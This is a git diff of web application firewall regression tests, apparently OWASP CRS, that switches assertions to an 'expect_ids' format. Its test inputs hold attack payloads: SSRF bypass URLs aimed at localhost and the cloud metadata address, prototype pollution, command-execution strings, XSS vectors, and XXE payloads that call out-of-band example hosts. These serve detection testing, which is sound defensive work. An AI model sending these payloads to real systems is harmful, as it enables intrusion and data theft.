test_id: 37 desc: SSRF - URL bypass, IP + domain stages: @@ -632,7 +667,8 @@ tests: uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 38 desc: SSRF - URL bypass, domain + IP stages: @@ -649,7 +685,8 @@ tests: uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 39 desc: SSRF - Enclosed alphanumerics, dots stages: @@ -666,7 +703,8 @@ tests: uri: "/get?ssrf=http://169。254。169。254/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 40 desc: SSRF - IPv6, the unspecified address stages: @@ -683,7 +721,8 @@ tests: uri: "/get?ssrf=http://[::]/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 41 desc: SSRF - Glibc NSS features stages: @@ -700,7 +739,8 @@ tests: uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 42 desc: SSRF - Glibc NSS features stages: @@ -717,7 +757,8 @@ tests: uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 43 desc: SSRF - Input variable coverage test (Dotless decimal) stages: @@ -735,7 +776,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -751,7 +793,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -774,7 +817,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -789,7 +833,8 @@ tests: uri: "/get?http://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -804,7 +849,8 @@ tests: uri: "/get?ssrf=http://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -821,7 +867,8 @@ tests: data: "<?xml version=\"1.0\"?><xml><ssrf>http://2852039166/</ssrf></xml>" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 44 desc: SSRF - local_file:// url scheme - Dotless decimal stages: @@ -838,4 +885,5 @@ tests: uri: "/get?ssrf=local_file://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index f18d6bc0a..d4fa4810c 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=proto" version: HTTP/1.0 output: - no_log_contains: id "934130" + log: + no_expect_ids: [934130] - test_id: 2 desc: positive test case with JSON POST stages: @@ -36,7 +37,8 @@ tests: data: | {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 3 desc: positive test case, CVE-2021-20083 stages: @@ -51,7 +53,8 @@ tests: uri: "/get?__proto__[test]=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 4 desc: positive test case, CVE-2021-20084, 1/2 stages: @@ -66,7 +69,8 @@ tests: uri: "/get?__proto__.test=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 5 desc: positive test case, CVE-2021-20084, 2/2 stages: @@ -81,7 +85,8 @@ tests: uri: "/get?constructor.prototype.test=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 6 desc: positive test case with space evasion, CVE-2021-20084, 2/2 stages: @@ -96,7 +101,8 @@ tests: uri: "/get?constructor.prototype.%20test=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 7 desc: positive test case with GET parameter, jQuery $.get stages: @@ -111,7 +117,8 @@ tests: uri: "/get?__proto__[context]=<img/src/onerror%3dalert(1)>" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 8 desc: positive test case with GET parameter, V4Fire Core Library stages: @@ -126,7 +133,8 @@ tests: uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 9 desc: positive test case with GET parameter, analytics-utils < 1.0.3 stages: @@ -141,7 +149,8 @@ tests: uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 10 desc: positive test case with GET parameter, jQuery $.get stages: @@ -156,7 +165,8 @@ tests: uri: "/get?__proto__[jquery]=x" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 11 desc: positive test case with GET parameter, Vue.js stages: @@ -171,7 +181,8 @@ tests: uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 12 desc: "Detect example payload __proto__... submitted as plaintext" stages: @@ -187,7 +198,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 13 desc: "Detect example payload __proto__... submitted as plaintext with JavaScript escape sequence obfuscation" stages: @@ -203,4 +215,5 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934130" + log: + expect_ids: [934130] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index 04d1dd2e4..f4fce6961 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -18,4 +18,5 @@ tests: uri: "/get?x=@{[system+whoami]}" version: HTTP/1.0 output: - log_contains: id "934140" + log: + expect_ids: [934140] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml index 744933f91..01a2b4598 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml @@ -18,4 +18,5 @@ tests: uri: "/get?x=Process.spawn(%22id%22)" version: HTTP/1.0 output: - log_contains: id "934150" + log: + expect_ids: [934150] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml index 6b4f240fc..437a05641 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?text=while%20(foo)%20is%20bar." version: HTTP/1.0 output: - no_log_contains: id "934160" + log: + no_expect_ids: [934160] - test_id: 2 desc: while falsy with negations stages: @@ -33,7 +34,8 @@ tests: uri: "/get?eval=while(!false)" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 3 desc: while falsy with negations stages: @@ -48,7 +50,8 @@ tests: uri: "/get?eval=while(!-0);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 4 desc: while falsy with negations stages: @@ -63,7 +66,8 @@ tests: uri: "/get?eval=while(!%2B0);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 5 desc: while falsy with negations stages: @@ -78,7 +82,8 @@ tests: uri: "/get?eval=while(!0);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 6 desc: while falsy with negations stages: @@ -93,7 +98,8 @@ tests: uri: "/get?eval=while(!-0);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 7 desc: while falsy with negations stages: @@ -108,7 +114,8 @@ tests: uri: '/get?eval=while(!"");' version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 8 desc: while falsy with negations stages: @@ -123,7 +130,8 @@ tests: uri: "/get?eval=while(!'');" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 9 desc: while falsy with negations stages: @@ -138,7 +146,8 @@ tests: uri: "/get?eval=while(!``);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 10 desc: while truthy stages: @@ -153,7 +162,8 @@ tests: uri: "/get?eval=while(true);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 11 desc: while truthy stages: @@ -168,7 +178,8 @@ tests: uri: "/get?eval=while(Infinity);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 12 desc: while truthy stages: @@ -183,7 +194,8 @@ tests: uri: "/get?eval=while(-Infinity);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 13 desc: while truthy stages: @@ -198,7 +210,8 @@ tests: uri: "/get?eval=while(%2BInfinity);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 14 desc: while truthy stages: @@ -213,7 +226,8 @@ tests: uri: "/get?eval=while(-1);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 15 desc: while truthy stages: @@ -228,7 +242,8 @@ tests: uri: "/get?eval=while(%2B1);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 16 desc: while truthy stages: @@ -243,7 +258,8 @@ tests: uri: "/get?eval=while(new%20Date);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 17 desc: while truthy stages: @@ -258,7 +274,8 @@ tests: uri: "/get?eval=while(this);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 18 desc: while truthy stages: @@ -273,7 +290,8 @@ tests: uri: "/get?eval=while(String);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 19 desc: while truthy with negation (false positive) stages: @@ -288,7 +306,8 @@ tests: uri: "/get?eval=while(!true);" version: HTTP/1.0 output: - no_log_contains: id "934160" + log: + no_expect_ids: [934160] - test_id: 20 desc: while truthy with double negation stages: @@ -303,7 +322,8 @@ tests: uri: "/get?eval=while(!!{});" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 21 desc: while truthy with double negation stages: @@ -318,7 +338,8 @@ tests: uri: "/get?eval=while(!![]);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 22 desc: while truthy with double negation stages: @@ -333,7 +354,8 @@ tests: uri: '/get?eval=while(!!"");' version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 23 desc: while truthy with double negation stages: @@ -348,7 +370,8 @@ tests: uri: "/get?eval=while(!!'');" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 24 desc: while truthy with double negation stages: @@ -363,7 +386,8 @@ tests: uri: "/get?eval=while(!!``);" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 25 desc: while falsy with negation stages: @@ -378,7 +402,8 @@ tests: uri: "/get?eval=while(!null)" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 26 desc: while falsy with negation stages: @@ -393,7 +418,8 @@ tests: uri: "/get?eval=while(!undefined)" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 27 desc: while falsy with negation stages: @@ -408,7 +434,8 @@ tests: uri: "/get?eval=while(!NaN)" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 28 desc: while truthy stages: @@ -423,7 +450,8 @@ tests: uri: "/get?eval=while((true)))" version: HTTP/1.0 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 29 desc: "Detect example DoS loop while(true) submitted as plaintext" stages: @@ -438,7 +466,8 @@ tests: uri: "/get?eval=while(true);" version: HTTP/1.1 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 30 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation" stages: @@ -453,7 +482,8 @@ tests: uri: "/get?eval=while(true);" version: HTTP/1.1 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 31 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded" stages: @@ -468,7 +498,8 @@ tests: uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" version: HTTP/1.1 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 32 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: @@ -483,7 +514,8 @@ tests: uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" version: HTTP/1.1 output: - log_contains: id "934160" + log: + expect_ids: [934160] - test_id: 33 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: @@ -498,4 +530,5 @@ tests: uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" version: HTTP/1.1 output: - log_contains: id "934160" + log: + expect_ids: [934160] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml index 8348a8bb9..2505e4abe 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml @@ -20,7 +20,8 @@ tests: uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo=" version: "HTTP/1.1" output: - log_contains: id "934170" + log: + expect_ids: [934170] - test_id: 2 desc: "Negative test - data:// should not match" stages: @@ -37,7 +38,8 @@ tests: uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo=" version: "HTTP/1.1" output: - no_log_contains: id "934170" + log: + no_expect_ids: [934170] - test_id: 3 desc: "Status Page Test - SSRF - data: scheme test - simple trigger, isolated test" stages: @@ -54,4 +56,5 @@ tests: uri: "/get?ssrf=data:text/plain" version: "HTTP/1.1" output: - log_contains: id "934170" + log: + expect_ids: [934170] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml index a198c9b50..edea0617d 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941100" + log: + expect_ids: [941100] - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: @@ -33,7 +34,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941100" + log: + expect_ids: [941100] - test_id: 3 desc: XSS testing of libinjection in User-Agent stages: @@ -48,7 +50,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941100" + log: + expect_ids: [941100] - test_id: 4 desc: XSS testing of libinjection in User-Agent stages: @@ -64,7 +67,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: id "941100" + log: + no_expect_ids: [941100] - test_id: 5 desc: XSS testing of libinjection in User-Agent stages: @@ -80,7 +84,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: id "941100" + log: + no_expect_ids: [941100] - test_id: 6 desc: Status Page Test - simplified XSS testing of libinjection in ARGS stages: @@ -96,4 +101,5 @@ tests: data: foo=<xss onbeforehellfreezes%3Daler%77(1)> version: "HTTP/1.1" output: - log_contains: id "941100" + log: + expect_ids: [941100] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml index 7b42a9758..8d1bc6368 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941101" + log: + expect_ids: [941101] - test_id: 2 stages: - input: @@ -32,7 +33,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941101" + log: + expect_ids: [941101] - test_id: 3 desc: "SVG onload injection in filename" stages: @@ -47,4 +49,5 @@ tests: uri: "/get/index.php/%3Csvg/onload=alert()" version: HTTP/1.0 output: - log_contains: id "941101" + log: + expect_ids: [941101] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml index a8cf44d7a..d1b88c709 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml @@ -19,7 +19,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 2 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: @@ -34,7 +35,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 3 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: @@ -49,7 +51,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 4 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: @@ -65,7 +68,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 5 desc: XSS in URI / PATH_INFO going undetected - GH issue 1022 stages: @@ -80,7 +84,8 @@ tests: User-Agent: "OWASP CRS test agent" version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 6 desc: XSS in payload using %uNNNN stages: @@ -98,7 +103,8 @@ tests: var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 7 desc: XSS in payload with individual code points urlencoded stages: @@ -116,7 +122,8 @@ tests: var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 8 desc: XSS in cookie name using unicode stages: @@ -132,7 +139,8 @@ tests: Cookie: <script >alert(1)</script>=value version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 9 desc: XSS in Referer using html entities stages: @@ -148,7 +156,8 @@ tests: User-Agent: "OWASP CRS test agent" version: "HTTP/1.1" output: - log_contains: id "941110" + log: + expect_ids: [941110] - test_id: 10 desc: GH issue 1481 stages: @@ -163,4 +172,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: id "941110" + log: + no_expect_ids: [941110] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml index d5d2580c7..004cc9e13 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml @@ -17,7 +17,8 @@ tests: uri: "/post?%20%20onload%3d%20=vardata" version: HTTP/1.0 output: - log_contains: id "941120" + log: + expect_ids: [941120] - test_id: 2 desc: "XSS Filter - Category 2: Event Handler Vector" stages: @@ -32,7 +33,8 @@ tests: uri: "/post?%20%20onabcdefgh%3d%20=vardata" version: HTTP/1.0 output: - log_contains: id "941120" + log: + expect_ids: [941120] - test_id: 3 desc: "XSS Filter - Category 2: Event Handler Vector" stages: @@ -47,7 +49,8 @@ tests: uri: "/post?%20%20onab%3d%20=vardata" version: HTTP/1.0 output: - no_log_contains: id "941120" + log: + no_expect_ids: [941120] - test_id: 4 desc: "XSS Filter - Category 2: Event Handler Vector" stages: @@ -62,7 +65,8 @@ tests: uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" version: HTTP/1.0 output: - no_log_contains: id "941120" + log: + no_expect_ids: [941120] - test_id: 5 desc: "XSS Filter - Category 2: Event Handler Vector" stages: @@ -78,7 +82,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "941120" + log: + no_expect_ids: [941120] - test_id: 6 desc: "SVG onload injection in filename" stages: @@ -93,4 +98,5 @@ tests: uri: "/get/index.php/%3Csvg/onload=alert()" version: HTTP/1.0 output: - log_contains: id "941120" + log: + expect_ids: [941120] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index a856409c0..4a053dcd1 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 2 desc: "XSS test for 941130" stages: @@ -34,7 +35,8 @@ tests: data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % lbsod SYSTEM \"http://im8vx9fw5e2ibzctphxn9vauwl2m0joncfz5nu.example'||'foo.bar/\">%lbsod;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 3 desc: "XSS test for 941130" stages: @@ -50,7 +52,8 @@ tests: data: "var=<aai xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://c5ipg3yqo8lcutvn8bghsptofflee424qxdq1f.examplefoo.bar/aai.xsd\">aai</aai>" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 4 desc: "XSS test for 941130" stages: @@ -66,7 +69,8 @@ tests: data: "var=abcd'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % cgger SYSTEM \"http://ved8pm79xruv3c46hup01827oyuzxtlx9qwjk8.example'||'foo.bar/\">%cgger;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 5 desc: "XSS test for 941130" stages: @@ -82,7 +86,8 @@ tests: data: "var=<acp xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"http://sgc5rj96zows5963jrrx3544qvwtnubvzomfa4.examplefoo.bar/foo\"/></acp>" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 6 desc: "XSS test for 941130" stages: @@ -98,7 +103,8 @@ tests: data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % grorj SYSTEM \"http://yikbtpbc1uyy7f89lxt35b6as1yw1qpudm0co1.example'||'foo.bar/\">%grorj;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 7 desc: "XSS test for 941130" stages: @@ -114,7 +120,8 @@ tests: data: "var=<afa xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://2mpfxtfg5y22bjcdp1x79faew52420q0er1hp6.examplefoo.bar/afa.xsd\">afa</afa>" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 8 desc: "XSS test for 941130" stages: @@ -130,7 +137,8 @@ tests: data: "var=<chj xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\">chj</chj>" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 9 desc: "XSS test for 941130" stages: @@ -146,7 +154,8 @@ tests: data: "var=/content.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % dwusu SYSTEM \"http://ehzrs5as0axe6v7pkdsj4r5qrhxcp6da12osch.example'||'foo.bar/\">%dwusu;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 10 desc: "XSS test for 941130" stages: @@ -162,7 +171,8 @@ tests: data: "var=EmptyValue'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM \"http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/\">%awpsd;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 11 desc: "XSS test for 941130" stages: @@ -178,7 +188,8 @@ tests: data: "var=file:/boot.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % cwtpc SYSTEM \"http://gvft67ouecbgkxlryf6litjs5jbd5htlhd43ss.example'||'foo.bar/\">%cwtpc;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 12 desc: "XSS test for 941130" stages: @@ -194,7 +205,8 @@ tests: data: "var=Matched Data: <!ENTITY % awfke SYSTEM found within ARGS_NAMES:1'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % awfke SYSTEM \"http://gj3tu7cu2czg8x9rmful6t7stjzcp4d812osch.example'||'foo.bar/\">%awfke;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 13 desc: "XSS test for 941130" stages: @@ -210,7 +222,8 @@ tests: data: "var=<oez xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://eygr95rshaeenvop1d9jlrmq8hegib6bu4hx5m.examplefoo.bar/oez.xsd\">oez</oez>" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 14 desc: "XSS test for 941130" stages: @@ -226,7 +239,8 @@ tests: data: "var=(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % anwyn SYSTEM \"http://y98bkp2csupyyfz9cxk3wbxaj1pzuzi26vtohd.example'||'foo.bar/\">%anwyn;" version: HTTP/1.0 output: - log_contains: id "941130" + log: + expect_ids: [941130] - test_id: 15 desc: "XSS test for 941130" stages: @@ -242,7 